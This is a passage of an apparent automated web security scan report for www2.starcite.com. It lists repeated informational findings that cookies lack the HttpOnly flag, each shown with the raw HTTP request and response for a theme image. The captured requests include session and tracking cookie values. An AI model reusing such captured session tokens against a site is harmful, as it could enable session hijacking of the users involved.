
Request

GET /starcite/themes/garland/images/footer-boxleft.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:33 GMT
Server: Apache
Last-Modified: Thu, 16 Oct 2008 23:41:00 GMT
ETag: "1000000002cb6-98-45967618d5b00"
Accept-Ranges: bytes
Content-Length: 152
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:59 GMT;path=/

2.128. http://www2.starcite.com/starcite/themes/garland/images/footer-boxmiddle.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/footer-boxmiddle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/footer-boxmiddle.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:33 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002cb7-341-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 833
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:59 GMT;path=/

2.129. http://www2.starcite.com/starcite/themes/garland/images/footer-boxright.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/footer-boxright.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/footer-boxright.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:33 GMT
Server: Apache
Last-Modified: Thu, 16 Oct 2008 23:41:00 GMT
ETag: "1000000002cb8-98-45967618d5b00"
Accept-Ranges: bytes
Content-Length: 152
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:59 GMT;path=/

2.130. http://www2.starcite.com/starcite/themes/garland/images/grey_bbdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_bbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_bbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:46 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 23:31:00 GMT
ETag: "1000000002cc3-2e-45514d4847500"
Accept-Ranges: bytes
Content-Length: 46
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:12 GMT;path=/

2.131. http://www2.starcite.com/starcite/themes/garland/images/grey_lbdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_lbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_lbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002cc5-41-455110eec1300"
Accept-Ranges: bytes
Content-Length: 65
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

2.132. http://www2.starcite.com/starcite/themes/garland/images/grey_left_bbdr1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_left_bbdr1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_left_bbdr1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:46 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002cc8-98-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 152
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:11 GMT;path=/

2.133. http://www2.starcite.com/starcite/themes/garland/images/grey_left_tbdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_left_tbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_left_tbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Sat, 23 Aug 2008 02:44:00 GMT
ETag: "1000000002ccb-394-4551786bd3c00"
Accept-Ranges: bytes
Content-Length: 916
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/

2.134. http://www2.starcite.com/starcite/themes/garland/images/grey_rbdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_rbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_rbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:45 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002cce-2c-455110eec1300"
Accept-Ranges: bytes
Content-Length: 44
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:11 GMT;path=/

2.135. http://www2.starcite.com/starcite/themes/garland/images/grey_right_bbdr1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_right_bbdr1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_right_bbdr1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:46 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002cd1-97-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 151
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:11 GMT;path=/

2.136. http://www2.starcite.com/starcite/themes/garland/images/grey_right_tbdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_right_tbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_right_tbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Sat, 23 Aug 2008 02:44:00 GMT
ETag: "1000000002cd3-a8-4551786bd3c00"
Accept-Ranges: bytes
Content-Length: 168
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/


2.137. http://www2.starcite.com/starcite/themes/garland/images/grey_tbdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/grey_tbdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/grey_tbdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002cd6-3c-455110eec1300"
Accept-Ranges: bytes
Content-Length: 60
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/


2.138. http://www2.starcite.com/starcite/themes/garland/images/header_top-ie.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/header_top-ie.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/header_top-ie.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:23 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 19:40:23 GMT
ETag: "10000000031a1-fe2-47f58526457c0"
Accept-Ranges: bytes
Content-Length: 4066
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/


2.139. http://www2.starcite.com/starcite/themes/garland/images/href_arrow.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/href_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/href_arrow.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002cdd-59-455110eec1300"
Accept-Ranges: bytes
Content-Length: 89
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/


2.140. http://www2.starcite.com/starcite/themes/garland/images/left_bdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/left_bdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/left_bdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2008 18:48:00 GMT
ETag: "1000000002cee-4d-454d486e81800"
Accept-Ranges: bytes
Content-Length: 77
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/


2.141. http://www2.starcite.com/starcite/themes/garland/images/link-cust-login.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/link-cust-login.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/link-cust-login.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:22 GMT
Server: Apache
Last-Modified: Fri, 01 Aug 2008 19:16:00 GMT
ETag: "1000000002cf3-d91-4536ad1e61c00"
Accept-Ranges: bytes
Content-Length: 3473
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:47 GMT;path=/


2.142. http://www2.starcite.com/starcite/themes/garland/images/new-bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/new-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/new-bg.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002cfe-13b8-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 5048
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/


2.143. http://www2.starcite.com/starcite/themes/garland/images/right_bdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/right_bdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/right_bdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2008 18:48:00 GMT
ETag: "1000000002d07-70-454d486e81800"
Accept-Ranges: bytes
Content-Length: 112
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/


2.144. http://www2.starcite.com/starcite/themes/garland/images/secondarymenuactive.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/secondarymenuactive.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/secondarymenuactive.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Fri, 01 Aug 2008 19:16:00 GMT
ETag: "1000000002d0e-69-4536ad1e61c00"
Accept-Ranges: bytes
Content-Length: 105
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/


2.145. http://www2.starcite.com/starcite/themes/garland/images/section_btm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/section_btm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

